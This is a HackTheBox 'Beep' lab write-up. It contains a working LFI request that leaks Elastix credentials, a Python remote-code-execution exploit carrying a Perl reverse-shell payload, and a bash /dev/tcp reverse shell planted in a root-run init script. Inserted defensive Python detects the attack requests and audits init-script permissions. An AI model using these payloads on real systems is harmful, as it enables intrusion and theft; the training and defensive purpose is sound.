HackTheBox: Beep

The first step, as with all machines, is to run an Nmap scan to identify the running services.

# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 2m00s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds

From here we can see there are numerous services running on the box, most notably a MySQL server, a mail server and an Asterisk PBX. I started by browsing to port 80 and found the Elastix PBX web interface running. I attempted to log in with default credentials, but this was unsuccessful.

I did some searching for Elastix exploits. It's difficult to tell from the login page which version of the software is running, so much of this is trial and error. I found the LFI exploit HERE, which allows you to read the amportal.conf configuration file. This file contains plaintext credentials for the Elastix web interface. It can be retrieved via the following link:

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00&module=Accounts&action

Inside this file is the following block of text, which includes the credentials to log in to the Elastix web interface.

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE

ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE


vtigerCRM
adminL:jEhdIekWmdjE

Next I found THIS exploit, which leverages the $to parameter of the callme_page.php page to achieve remote code execution. By default the code would not work because of certificate errors on the login page; it had to be modified slightly to rectify this, along with changing the lhost and rhost values. I also had to lower the minimum SSL version on my Kali machine by editing /etc/ssl/openssl.cnf to accept TLSv1, and modify the extension number to match one on the Beep machine. The extension can be gathered by logging into the Elastix web interface, opening the PBX tab and finding the user Fanis Papafanopoulos with extension 233. The exploit code ultimately looked like the following:

import urllib
rhost="10.10.10.7"
lhost="10.10.14.29"
lport=443
extension="233"

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)
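From a defender's side, both the LFI request above and the callme_page.php request leave a recognisable trace in the Apache access log: a traversal sequence with a trailing %00 in module_name, and CRLF sequences injected into callmenum. The following Python is an added example (not from the original post or from Elastix) that flags such requests in combined-format log lines; the sample log lines are constructed and the suspicious_requests function is my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.29 - - [23/Aug/2020:06:41:02 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.29 - - [23/Aug/2020:06:41:10 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system HTTP/1.1" 200 221 "-" "python-urllib/2.7"
192.168.1.5 - - [23/Aug/2020:06:42:00 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
"""

# Source IP, timestamp, method, request target and status code of a combined-format line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def suspicious_requests(log_text):
    """Return (source_ip, path, reasons) for each request whose query string
    carries a traversal sequence, a null byte or a CR/LF after URL decoding."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        reasons = set()
        # parse_qs percent-decodes values, so %00 and %0D%0A become real control bytes here.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if "../" in value or "..\\" in value:
                    reasons.add("path traversal in " + name)
                if "\x00" in value:
                    reasons.add("null byte in " + name)
                if "\r" in value or "\n" in value:
                    reasons.add("CRLF injection in " + name)
        if reasons:
            findings.append((m.group("src"), parts.path, sorted(reasons)))
    return findings


if __name__ == "__main__":
    for src, path, reasons in suspicious_requests(SAMPLE_LOG):
        print(src, path, ", ".join(reasons))
```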

I then started a netcat listener on port 443, ran the exploit and received a shell on the listener. I upgraded the shell with python to something more workable, then browsed to the fanis user's home directory and captured the user flag.

kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis  spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$ 

Next we have to escalate privileges to root. I ran “ps aux” to see which programs were running. The following process caught my eye: it was running as root, but the script file was owned by and writable by the asterisk user. This allows me to modify the file and then have it run as root to spawn a root reverse shell.

root      3571  0.0  0.1   4636  1168 ?        S    21:06   0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start
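The underlying weakness here is an init script that runs as root but can be edited by a service account. The following Python is an added example (not the author's or Elastix's code) that audits rc directories for scripts not owned by root or writable by group or others; the directory list, the function name insecure_init_scripts and the trusted_uids parameter are my assumptions.

```python
import os
import stat


def insecure_init_scripts(script_dirs, trusted_uids=(0,)):
    """Return (script_path, reasons) for every regular file reachable from the
    given rc/init directories that a non-root user could modify."""
    findings = []
    for directory in script_dirs:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            link = os.path.join(directory, name)
            # rc3.d entries are normally symlinks into /etc/init.d; audit the real file.
            target = os.path.realpath(link)
            try:
                st = os.stat(target)
            except OSError:
                findings.append((link, ["dangling symlink"]))
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if st.st_uid not in trusted_uids:
                reasons.append("owned by uid %d, not root" % st.st_uid)
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                findings.append((target, reasons))
    return findings


if __name__ == "__main__":
    # Assumed locations for a SysV-style CentOS 5 host such as this box.
    for path, reasons in insecure_init_scripts(["/etc/rc3.d", "/etc/init.d"]):
        print(path, ", ".join(reasons))
```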

I started by modifying the file with the following reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1

I then started a netcat listener on port 2600 on the kali machine:

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...

I then needed a way to start the elastix-updaterd process. After some trial and error I found that rebooting the system through the Elastix interface caused the elastix-updaterd script to run as root.

Once the reboot completed, I had a shell on my netcat listener. From here I confirmed it was a root shell and was able to cat the root flag.

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...

10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell
bash-3.2# whoami
root
bash-3.2# cd /root
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2# 
